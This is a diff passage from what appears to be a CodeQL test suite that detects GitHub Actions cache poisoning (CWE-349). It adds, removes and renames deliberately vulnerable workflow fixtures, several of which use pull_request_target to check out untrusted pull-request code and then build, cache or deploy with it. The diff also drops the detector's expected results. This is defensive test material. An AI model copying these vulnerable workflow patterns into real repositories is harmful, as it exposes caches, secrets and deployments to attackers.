GitHub Pages - permissions: - contents: read - pages: write - id-token: write - runs-on: ubuntu-latest - needs: build - steps: - - name: Deploy to GitHub Pages - id: deployment - uses: actions/deploy-pages@d6db90164ac5ed86f2b6aed7e0febac5b3c0c03e # v4 - with: - preview: 'true' diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/poc2.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/poc2.yml deleted file mode 100644 index 5501beb9ea2f..000000000000 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/poc2.yml +++ /dev/null 
@@ -1,58 +0,0 @@ -name: branch-deploy - -on: - issue_comment: - types: [created] - -# Permissions needed for reacting and adding comments for IssueOps commands -permissions: - pull-requests: write - deployments: write - contents: write - checks: read - -jobs: - branch-deploy: - name: branch-deploy - if: # only run on pull request comments and very specific comment body string as defined in our branch-deploy settings - ${{ github.event.issue.pull_request && - (startsWith(github.event.comment.body, '.deploy') || - startsWith(github.event.comment.body, '.noop') || - startsWith(github.event.comment.body, '.lock') || - startsWith(github.event.comment.body, '.help') || - startsWith(github.event.comment.body, '.wcid') || - startsWith(github.event.comment.body, '.unlock')) }} - runs-on: ubuntu-latest - - steps: - - name: branch-deploy - id: branch-deploy - uses: github/branch-deploy@v9 - with: - trigger: ".deploy" - environment: "production" - sticky_locks: "true" # https://github.com/github/branch-deploy/blob/1f6516ef5092890ce75d9e97ca7cbdb628e38bdd/docs/hubot-style-deployment-locks.md - - # Check out the ref from the output of the IssueOps command - - uses: actions/checkout@v4 - if: ${{ steps.branch-deploy.outputs.continue == 'true' }} - with: - ref: ${{ steps.branch-deploy.outputs.ref }} - - - uses: ruby/setup-ruby@d4526a55538b775af234ba4af27118ed6f8f6677 # pin@v1.172.0 - if: ${{ steps.branch-deploy.outputs.continue == 'true' }} - with: - bundler-cache: true - - - name: bootstrap - if: ${{ steps.branch-deploy.outputs.continue == 'true' }} - run: script/bootstrap - - # Here we run a deploy. 
It is "gated" by the IssueOps logic and will only run if the outputs from our branch-deploy step indicate that the workflow should continue - - name: deploy - if: ${{ steps.branch-deploy.outputs.continue == 'true' && steps.branch-deploy.outputs.noop != 'true' }} - run: | - set -o pipefail - script/deploy | tee deploy.out - bundle exec ruby script/ci/render_deploy_message.rb - rm deploy.out diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/poc3.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/poc3.yml deleted file mode 100644 index 4d5ae1f528cd..000000000000 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/poc3.yml +++ /dev/null 
@@ -1,64 +0,0 @@ -name: Publish - -on: - push: - branches: - - main - pull_request_target: - workflow_dispatch: - workflow_call: - -jobs: - build-and-upload: - runs-on: ubuntu-latest - permissions: - contents: read - steps: - - - name: Checkout PR - if: ${{ github.event_name == 'pull_request_target' }} - uses: actions/checkout@v3 - with: - ref: ${{ github.event.pull_request.head.ref }} - repository: ${{ github.event.pull_request.head.repo.full_name }} - - - name: Checkout - if: ${{ github.event_name != 'pull_request_target' }} - uses: actions/checkout@v3 - with: - ref: main - - - name: Setup Pages - uses: actions/configure-pages@v1 - - name: Use Node.js - uses: actions/setup-node@v3 - with: - node-version: 18 - cache: npm - - name: Update npm to latest - run: npm i --prefer-online --no-fund --no-audit -g npm@latest - - run: npm -v - - run: npm i --ignore-scripts --no-audit --no-fund --package-lock - - run: npm run build -w www - - name: Upload artifact - uses: actions/upload-pages-artifact@v1 - with: - path: './workspaces/www/build' - - deploy: - runs-on: ubuntu-latest - needs: build-and-upload - environment: - name: github-pages - url: ${{ steps.deployment.outputs.page_url }} - permissions: - pages: write - id-token: write - outputs: - deployment_url: ${{ steps.deployment.outputs.page_url }} - steps: - - name: Deploy to GitHub Pages - id: deployment - uses: actions/deploy-pages@v1 - with: - preview: ${{ github.event_name == 'pull_request_target' }} diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test8.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test8.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step1.yml 
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test17.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test17.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step2.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml new file mode 100644 index 000000000000..8539bf2bda43 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml @@ -0,0 +1,19 @@ +name: Publish + +on: + pull_request_target: + +jobs: + build-and-upload: + runs-on: ubuntu-latest + permissions: + contents: read + steps: + + - name: Checkout PR + uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + + - run: npm run build -w www diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml new file mode 100644 index 000000000000..6e2351c17446 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml @@ -0,0 +1,18 @@ +name: OpenAPI +on: + pull_request_target: + +permissions: {} + +jobs: + + openapi-base: + runs-on: ubuntu-latest + permissions: read-all + steps: + - name: Checkout repository + uses: actions/checkout@a5ac7e51b41094c92402da3b24376905380afc29 # v4.1.6 + with: + ref: ${{ github.event.pull_request.head.sha }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - run: ./foo diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml new file mode 100644 index 000000000000..9742bd01a48a --- /dev/null 
+++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml @@ -0,0 +1,28 @@ +name: Test +on: + pull_request_target: + branches: ["main"] + +permissions: + contents: read + pages: write + id-token: write + +jobs: + build: + permissions: + contents: read + runs-on: ubuntu-latest + steps: + - name: Checkout + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - name: Setup Pages + uses: actions/configure-pages@983d7736d9b0ae728b81ab479565c72886d7745b # v5 + - name: Build with Jekyll + uses: actions/jekyll-build-pages@b178f9334b208360999a0a57b523613563698c66 # v1 + with: + source: ./ + destination: ./_site diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test19.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test19.yml deleted file mode 100644 index 1f0e7291442c..000000000000 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test19.yml +++ /dev/null 
@@ -1,42 +0,0 @@ -name: Close Translation Pull Requests - -on: - pull_request_target: - branches: [ master, main, dev ] - -jobs: - - close-translation-prs: - - name: Close Translation Pull Requests - runs-on: ubuntu-latest - - steps: - - name: Get changed files - id: modified_files - uses: trilom/file-changes-action@v1.2.4 - with: - output: "," - - - name: Check the PR for translations - id: check - run: | - shopt -s nocasematch - if [[ "${{ steps.modified_files.outputs.files_modified }}" == *"en_gb/strings.po"* ]]; then - echo "Found modified en_gb, likely a valid PR" - unset CLOSE - elif [[ "${{ steps.modified_files.outputs.files_modified }}" == *"strings.po"* ]]; then - echo "Found modified strings.po, unwanted." - CLOSE="true" - elif [[ "${{ steps.modified_files.outputs.files_added }}" == *"strings.po"* ]]; then - echo "Found added strings.po, unwanted." - CLOSE="true" - elif [[ "${{ steps.modified_files.outputs.files_removed }}" == *"strings.po"* ]]; then - echo "Found removed strings.po, unwanted." - CLOSE="true" - else - echo "No strings.po were modified or added, not a translation." - unset CLOSE - fi - echo ::set-output name=close::${CLOSE} - diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test20.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test20.yml deleted file mode 100644 index a07f2922fd7a..000000000000 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test20.yml +++ /dev/null 
@@ -1,46 +0,0 @@ -name: Publish - -on: - push: - branches: - - main - pull_request_target: - workflow_dispatch: - workflow_call: - -jobs: - build-and-upload: - runs-on: ubuntu-latest - permissions: - contents: read - steps: - - - name: Checkout PR - if: ${{ github.event_name == 'pull_request_target' }} - uses: actions/checkout@v3 - with: - ref: ${{ github.event.pull_request.head.ref }} - repository: ${{ github.event.pull_request.head.repo.full_name }} - - - name: Checkout - if: ${{ github.event_name != 'pull_request_target' }} - uses: actions/checkout@v3 - with: - ref: main - - - name: Setup Pages - uses: actions/configure-pages@v1 - - name: Use Node.js - uses: actions/setup-node@v3 - with: - node-version: 18 - cache: npm - - name: Update npm to latest - run: npm i --prefer-online --no-fund --no-audit -g npm@latest - - run: npm -v - - run: npm i --ignore-scripts --no-audit --no-fund --package-lock - - run: npm run build -w www - - name: Upload artifact - uses: actions/upload-pages-artifact@v1 - with: - path: './workspaces/www/build' diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test21.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test21.yml deleted file mode 100644 index 381cc16a6d16..000000000000 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test21.yml +++ /dev/null 
@@ -1,44 +0,0 @@ -name: OpenAPI -on: - push: - branches: - - master - tags: - - 'v*' - pull_request_target: - -permissions: {} - -jobs: - - openapi-base: - name: OpenAPI - BASE - if: ${{ github.base_ref != '' }} - runs-on: ubuntu-latest - permissions: read-all - steps: - - name: Checkout repository - uses: actions/checkout@a5ac7e51b41094c92402da3b24376905380afc29 # v4.1.6 - with: - ref: ${{ github.event.pull_request.head.sha }} - repository: ${{ github.event.pull_request.head.repo.full_name }} - fetch-depth: 0 - - name: Generate openapi.json - run: dotnet test tests/Jellyfin.Server.Integration.Tests/Jellyfin.Server.Integration.Tests.csproj -c Release --filter "Jellyfin.Server.Integration.Tests.OpenApiSpecTests" - - publish-unstable: - name: OpenAPI - Publish Unstable Spec - if: ${{ github.event_name != 'pull_request_target' && !startsWith(github.ref, 'refs/tags/v') && contains(github.repository_owner, 'jellyfin') }} - runs-on: ubuntu-latest - needs: - - openapi-base - steps: - - name: Upload openapi.json (unstable) to repository server - uses: appleboy/scp-action@917f8b81dfc1ccd331fef9e2d61bdc6c8be94634 # v0.1.7 - with: - host: "${{ secrets.REPO_HOST }}" - username: "${{ secrets.REPO_USER }}" - key: "${{ secrets.REPO_KEY }}" - source: openapi-head/openapi.json - strip_components: 1 - target: "/srv/incoming/openapi/unstable/jellyfin-openapi-${{ env.JELLYFIN_VERSION }}" diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test3.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test3.yml deleted file mode 100644 index fa56d074936b..000000000000 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test3.yml +++ /dev/null 
@@ -1,23 +0,0 @@ -name: Cache Poisoning - -on: pull_request_target - -permissions: {} - -jobs: - poison: - runs-on: ubuntu-latest - steps: - - uses: actions/checkout@v3 - with: - ref: ${{ github.event.pull_request.head.sha }} - - uses: actions/setup-java@v2 - with: - distribution: 'zulu' - java-version: '21' - cache: 'gradle' - cache-dependency-path: | - sub-project/*.gradle* - sub-project/**/gradle-wrapper.properties - - run: | - java HelloWorldApp.java diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test4.yml deleted file mode 100644 index 03eb9e99f0f2..000000000000 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test4.yml +++ /dev/null @@ -1,21 +0,0 @@ -name: Cache Poisoning - -on: pull_request_target - -permissions: - contents: read - -jobs: - poison: - runs-on: ubuntu-latest - permissions: read-all - steps: - - uses: actions/checkout@v3 - with: - ref: ${{ github.event.pull_request.head.sha }} - - uses: actions/setup-java@v2 - with: - distribution: 'zulu' - java-version: '21' - - run: | - java HelloWorldApp.java diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test5.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test5.yml deleted file mode 100644 index b7454d0a0dc1..000000000000 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test5.yml +++ /dev/null @@ -1,19 +0,0 @@ -name: Cache Poisoning - -on: pull_request_target - -jobs: - poison: - runs-on: ubuntu-latest - permissions: - contents: read - steps: - - uses: actions/checkout@v3 - with: - ref: ${{ github.event.pull_request.head.sha }} - - uses: actions/setup-go@v2 - with: - go-version-file: 'go.mod' - cache: false - - run: do some go stuff - diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test6.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test6.yml deleted file mode 100644 index 2fa898982bcd..000000000000 
--- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test6.yml +++ /dev/null @@ -1,18 +0,0 @@ -name: Cache Poisoning - -on: pull_request_target - -jobs: - poison: - runs-on: ubuntu-latest - permissions: read-all - steps: - - uses: actions/checkout@v3 - with: - ref: ${{ github.event.pull_request.head.sha }} - - uses: actions/setup-go@v2 - with: - go-version-file: 'go.mod' - cache: true - - run: do some go stuff - diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test7.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test7.yml deleted file mode 100644 index be83f83cf30b..000000000000 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test7.yml +++ /dev/null @@ -1,17 +0,0 @@ -name: Cache Poisoning - -on: pull_request_target - -jobs: - poison: - runs-on: ubuntu-latest - permissions: read-all - steps: - - uses: actions/checkout@v3 - with: - ref: ${{ github.event.pull_request.head.sha }} - - uses: actions/setup-go@v2 - with: - go-version-file: 'go.mod' - - run: do some go stuff - diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected deleted file mode 100644 index fdaf0cf25ad1..000000000000 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ /dev/null 
@@ -1,98 +0,0 @@ -edges -| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | -| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | -| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:47:9:52:6 | Run Step | -| .github/workflows/poc2.yml:47:9:52:6 | Run Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | -| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:25:7:31:4 | Uses Step | -| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:31:7:33:4 | Uses Step | -| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | -| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | -| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | -| .github/workflows/poc3.yml:40:7:41:4 | Run Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | -| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | -| .github/workflows/poc3.yml:42:7:43:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | -| .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:36:9:38:6 | Uses Step | -| .github/workflows/poc.yml:36:9:38:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | -| .github/workflows/poc.yml:38:9:43:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | -| .github/workflows/test1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/test1.yml:13:9:18:6 | Uses Step | -| .github/workflows/test1.yml:13:9:18:6 | Uses Step | .github/workflows/test1.yml:18:9:22:6 | Uses Step | -| .github/workflows/test1.yml:18:9:22:6 | Uses Step | .github/workflows/test1.yml:22:9:23:21 | Run Step | -| .github/workflows/test2.yml:11:9:14:6 | Uses Step | 
.github/workflows/test2.yml:14:9:18:6 | Uses Step | -| .github/workflows/test2.yml:14:9:18:6 | Uses Step | .github/workflows/test2.yml:18:9:19:21 | Run Step | -| .github/workflows/test3.yml:11:9:14:6 | Uses Step | .github/workflows/test3.yml:14:9:22:6 | Uses Step | -| .github/workflows/test3.yml:14:9:22:6 | Uses Step | .github/workflows/test3.yml:22:9:23:34 | Run Step | -| .github/workflows/test4.yml:13:9:16:6 | Uses Step | .github/workflows/test4.yml:16:9:20:6 | Uses Step | -| .github/workflows/test4.yml:16:9:20:6 | Uses Step | .github/workflows/test4.yml:20:9:21:34 | Run Step | -| .github/workflows/test5.yml:11:9:14:6 | Uses Step | .github/workflows/test5.yml:14:9:18:6 | Uses Step | -| .github/workflows/test5.yml:14:9:18:6 | Uses Step | .github/workflows/test5.yml:18:9:19:11 | Run Step | -| .github/workflows/test6.yml:10:9:13:6 | Uses Step | .github/workflows/test6.yml:13:9:17:6 | Uses Step | -| .github/workflows/test6.yml:13:9:17:6 | Uses Step | .github/workflows/test6.yml:17:9:18:11 | Run Step | -| .github/workflows/test7.yml:10:9:13:6 | Uses Step | .github/workflows/test7.yml:13:9:16:6 | Uses Step | -| .github/workflows/test7.yml:13:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:17:11 | Run Step | -| .github/workflows/test8.yml:10:9:12:6 | Uses Step: comment-branch | .github/workflows/test8.yml:12:9:15:6 | Uses Step | -| .github/workflows/test8.yml:12:9:15:6 | Uses Step | .github/workflows/test8.yml:15:9:17:2 | Run Step | -| .github/workflows/test8.yml:21:9:23:6 | Uses Step: comment-branch | .github/workflows/test8.yml:23:9:26:6 | Uses Step | -| .github/workflows/test8.yml:23:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:28:2 | Uses Step | -| .github/workflows/test8.yml:32:9:34:6 | Uses Step: comment-branch | .github/workflows/test8.yml:34:9:37:6 | Uses Step | -| .github/workflows/test8.yml:34:9:37:6 | Uses Step | .github/workflows/test8.yml:37:9:37:75 | Run Step | -| .github/workflows/test11.yml:11:9:14:6 | Uses Step: comment-branch | 
.github/workflows/test11.yml:14:9:19:6 | Uses Step | -| .github/workflows/test11.yml:14:9:19:6 | Uses Step | .github/workflows/test11.yml:19:9:23:6 | Uses Step | -| .github/workflows/test11.yml:19:9:23:6 | Uses Step | .github/workflows/test11.yml:23:9:24:21 | Run Step | -| .github/workflows/test12.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/test12.yml:14:9:19:6 | Uses Step | -| .github/workflows/test12.yml:14:9:19:6 | Uses Step | .github/workflows/test12.yml:19:9:20:30 | Run Step | -| .github/workflows/test13.yml:14:9:17:6 | Uses Step | .github/workflows/test13.yml:17:9:21:6 | Uses Step | -| .github/workflows/test13.yml:17:9:21:6 | Uses Step | .github/workflows/test13.yml:21:9:22:21 | Run Step | -| .github/workflows/test14.yml:14:9:17:6 | Uses Step | .github/workflows/test14.yml:17:9:21:6 | Uses Step | -| .github/workflows/test14.yml:17:9:21:6 | Uses Step | .github/workflows/test14.yml:21:9:22:21 | Run Step | -| .github/workflows/test15.yml:14:9:17:6 | Uses Step | .github/workflows/test15.yml:17:9:21:6 | Uses Step | -| .github/workflows/test15.yml:17:9:21:6 | Uses Step | .github/workflows/test15.yml:21:9:22:21 | Run Step | -| .github/workflows/test16.yml:14:9:17:6 | Uses Step | .github/workflows/test16.yml:17:9:21:6 | Uses Step | -| .github/workflows/test16.yml:17:9:21:6 | Uses Step | .github/workflows/test16.yml:21:9:22:21 | Run Step | -| .github/workflows/test17.yml:15:9:20:6 | Uses Step | .github/workflows/test17.yml:20:9:22:6 | Uses Step | -| .github/workflows/test17.yml:20:9:22:6 | Uses Step | .github/workflows/test17.yml:22:9:26:31 | Uses Step | -| .github/workflows/test18.yml:15:9:19:6 | Uses Step | .github/workflows/test18.yml:19:9:24:6 | Uses Step | -| .github/workflows/test18.yml:19:9:24:6 | Uses Step | .github/workflows/test18.yml:24:9:27:6 | Run Step | -| .github/workflows/test18.yml:24:9:27:6 | Run Step | .github/workflows/test18.yml:27:9:30:6 | Run Step | -| .github/workflows/test18.yml:27:9:30:6 | Run Step | 
.github/workflows/test18.yml:30:9:31:54 | Run Step | -| .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:21:9:41:49 | Run Step: check | -| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:25:7:31:4 | Uses Step | -| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:31:7:33:4 | Uses Step | -| .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | -| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | -| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:40:7:41:4 | Run Step | -| .github/workflows/test20.yml:40:7:41:4 | Run Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | -| .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | -| .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | -| .github/workflows/test21.yml:20:9:26:6 | Uses Step | .github/workflows/test21.yml:26:9:29:2 | Run Step | -| .github/workflows/test22.yml:13:9:14:6 | Uses Step | .github/workflows/test22.yml:14:9:18:6 | Uses Step | -| .github/workflows/test22.yml:14:9:18:6 | Uses Step | .github/workflows/test22.yml:18:9:25:6 | Uses Step: cache-pip | -| .github/workflows/test22.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/test22.yml:25:9:30:6 | Uses Step | -| .github/workflows/test22.yml:25:9:30:6 | Uses Step | .github/workflows/test22.yml:30:9:35:36 | Uses Step | -| .github/workflows/test23.yml:13:9:14:6 | Uses Step | .github/workflows/test23.yml:14:9:18:6 | Uses Step | -| .github/workflows/test23.yml:14:9:18:6 | Uses Step | .github/workflows/test23.yml:18:9:25:6 | Uses Step: cache-pip | -| .github/workflows/test23.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/test23.yml:25:9:30:6 | Uses Step | -| 
.github/workflows/test23.yml:25:9:30:6 | Uses Step | .github/workflows/test23.yml:30:9:35:36 | Uses Step | -#select -| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/poc3.yml:42:7:43:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/poc.yml:38:9:43:6 | Uses Step | .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test1.yml:18:9:22:6 | Uses Step | .github/workflows/test1.yml:13:9:18:6 | Uses Step | .github/workflows/test1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test2.yml:14:9:18:6 | Uses Step | .github/workflows/test2.yml:11:9:14:6 | Uses Step | .github/workflows/test2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. 
| -| .github/workflows/test3.yml:14:9:22:6 | Uses Step | .github/workflows/test3.yml:11:9:14:6 | Uses Step | .github/workflows/test3.yml:14:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test6.yml:13:9:17:6 | Uses Step | .github/workflows/test6.yml:10:9:13:6 | Uses Step | .github/workflows/test6.yml:13:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test7.yml:13:9:16:6 | Uses Step | .github/workflows/test7.yml:10:9:13:6 | Uses Step | .github/workflows/test7.yml:13:9:16:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test8.yml:15:9:17:2 | Run Step | .github/workflows/test8.yml:12:9:15:6 | Uses Step | .github/workflows/test8.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test8.yml:26:9:28:2 | Uses Step | .github/workflows/test8.yml:23:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test8.yml:37:9:37:75 | Run Step | .github/workflows/test8.yml:34:9:37:6 | Uses Step | .github/workflows/test8.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test11.yml:19:9:23:6 | Uses Step | .github/workflows/test11.yml:14:9:19:6 | Uses Step | .github/workflows/test11.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. 
| -| .github/workflows/test15.yml:17:9:21:6 | Uses Step | .github/workflows/test15.yml:14:9:17:6 | Uses Step | .github/workflows/test15.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test16.yml:17:9:21:6 | Uses Step | .github/workflows/test16.yml:14:9:17:6 | Uses Step | .github/workflows/test16.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test17.yml:22:9:26:31 | Uses Step | .github/workflows/test17.yml:15:9:20:6 | Uses Step | .github/workflows/test17.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. 
| -| .github/workflows/test21.yml:26:9:29:2 | Run Step | .github/workflows/test21.yml:20:9:26:6 | Uses Step | .github/workflows/test21.yml:26:9:29:2 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test23.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/test23.yml:25:9:30:6 | Uses Step | .github/workflows/test23.yml:18:9:25:6 | Uses Step: cache-pip | Potential cache poisoning in the context of the default branch due to downloading an untrusted artifact. | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.qlref b/ql/test/query-tests/Security/CWE-349/CachePoisoning.qlref deleted file mode 100644 index 2cbd05800e68..000000000000 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.qlref +++ /dev/null @@ -1,2 +0,0 @@ -Security/CWE-349/CachePoisoning.ql - diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected deleted file mode 100644 index e0a5e8fd4b1b..000000000000 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected +++ /dev/null 
